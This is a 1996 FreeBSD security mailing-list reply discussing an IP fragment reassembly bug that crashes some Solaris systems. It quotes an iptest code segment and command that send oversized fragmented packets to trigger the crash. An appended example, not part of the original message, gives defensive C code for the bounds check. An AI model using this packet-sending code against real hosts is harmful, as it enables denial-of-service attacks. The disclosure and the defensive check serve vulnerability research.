From owner-freebsd-security Tue Oct 22 06:38:07 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA28830 for security-outgoing; Tue, 22 Oct 1996 06:38:07 -0700 (PDT)
Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA28820 for ; Tue, 22 Oct 1996 06:38:01 -0700 (PDT)
Message-Id: <199610221338.GAA28820@freefall.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA045211312; Tue, 22 Oct 1996 23:35:12 +1000
From: Darren Reed
Subject: Re: [bugtraq] Serious Linux Security Bug
To: lutz@muc.de (Lutz Albers)
Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST)
Cc: security@freebsd.org
In-Reply-To: from "Lutz Albers" at Oct 22, 96 01:15:53 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Solaris2 was, I believe, vulnerable to this bug too.

From the "Crashable" file for iptest:

	Solaris 2.4 - up to and including 101945-34, > 34 ?
	Solaris 2.5 - 11/95

For those with it handy, "iptest -1 -p 8", but I built in some random
lossage which may stop it triggering the bug. I think if the lossage is
taken out, some systems will try to reassemble it all into a buffer which
(of course) is at most 64k in size. However, it doesn't try to send an
ICMP packet; the following segment of code is what triggers it:

	/*
	 * Segment of iptest; ip, u, id, i, nfd, mtu, gwip, send_ip() and
	 * PAUSE() are defined in the surrounding file.
	 */
	if (!ptest || (ptest == 8)) {
		struct timeval tv;

		gettimeofday(&tv, NULL);
		srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
		/*
		 * Part8: 63k packet + 1k fragment at offset 0x1ffe
		 */
		ip->ip_off = IP_MF;
		u->uh_dport = htons(9);
		ip->ip_id = htons(id++);
		printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
		ip->ip_len = 768 + 20 + 8;	/* first fragment, carries the UDP header */
		if ((rand() & 0x1f) != 0) {
			(void) send_ip(nfd, mtu, ip, gwip, 1);
			printf("%d\r", i);
		} else
			printf("skip 0\n");	/* the random lossage mentioned above */
		ip->ip_len = MIN(768 + 20, mtu - 68);
		i = 512;
		for (; i < (63 * 1024 + 768); i += 768) {
			ip->ip_off = IP_MF | (i >> 3);	/* ip_off counts 8-byte units */
			if ((rand() & 0x1f) != 0) {
				(void) send_ip(nfd, mtu, ip, gwip, 1);
				printf("%d\r", i);
			} else
				printf("skip %d\n", i);
			fflush(stdout);
			PAUSE();
		}
		ip->ip_len = 896 + 20;	/* final, larger fragment past the 63k mark */
		ip->ip_off = IP_MF | (i >> 3);
		if ((rand() & 0x1f) != 0) {
			(void) send_ip(nfd, mtu, ip, gwip, 1);
			printf("%d\r", i);
		} else
			printf("skip\n");
		putchar('\n');
		fflush(stdout);
	}

Doesn't work against any system using BSD-based IP networking code.

Darren
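The bound a fragment reassembler has to enforce before copying payload into its 64k buffer, as an added example that is not part of Darren's message or of iptest: it decodes ip_off/ip_len the way a reassembler does and refuses any fragment whose end would land past the maximum datagram size. The names (struct frag, frag_decode, frag_acceptable, fragment_ok) are mine, and the sample fragment is constructed from the "1k fragment at offset 0x1ffe" case named in the quoted comment.

```c
#include <stdint.h>

#define IP_MAXPACKET 65535u   /* ip_len is 16 bits, so a datagram is at most 64k */
#define IP_OFFMASK   0x1fffu  /* 13-bit fragment offset, in 8-byte units */
#define IP_MF_FLAG   0x2000u  /* "more fragments" bit of ip_off */

/* A fragment as a reassembler sees it, decoded from the IP header fields. */
struct frag {
    uint32_t start;   /* first payload byte within the reassembled datagram */
    uint32_t end;     /* one past the last payload byte */
    int mf;           /* more fragments follow? */
};

/* Decodes host-order ip_off and ip_len plus the header length into *f;
 * returns 0 when the length fields are inconsistent with each other. */
int frag_decode(uint16_t ip_off, uint16_t ip_len, unsigned hlen, struct frag *f)
{
    if (hlen < 20 || ip_len < hlen)
        return 0;
    f->start = (uint32_t)(ip_off & IP_OFFMASK) * 8;
    f->end = f->start + (ip_len - hlen);
    f->mf = (ip_off & IP_MF_FLAG) != 0;
    return 1;
}

/* The bound a reassembler must enforce before copying payload into its 64k
 * buffer: the fragment must end inside the maximum datagram, and a non-final
 * fragment must carry a multiple of 8 bytes (RFC 791). */
int frag_acceptable(const struct frag *f)
{
    if (f->end > IP_MAXPACKET)
        return 0;
    return !(f->mf && ((f->end - f->start) % 8) != 0);
}

/* Wrapper for raw header fields: -1 inconsistent header, 0 reject, 1 accept. */
int fragment_ok(uint16_t ip_off, uint16_t ip_len, unsigned hlen)
{
    struct frag f;
    if (!frag_decode(ip_off, ip_len, hlen, &f))
        return -1;
    return frag_acceptable(&f);
}

/* Constructed sample, the case the quoted comment names: a 1k fragment at
 * offset 0x1ffe with IP_MF set ends at 65520 + 1024 = 66544, past 64k. */
int rejects_1k_at_0x1ffe(void)
{
    return fragment_ok(IP_MF_FLAG | 0x1ffe, 1024 + 20, 20) == 0;
}
```

A reassembler that copies at f->start without this check writes up to 1k past the end of its 64k buffer, which is the crash the test provokes.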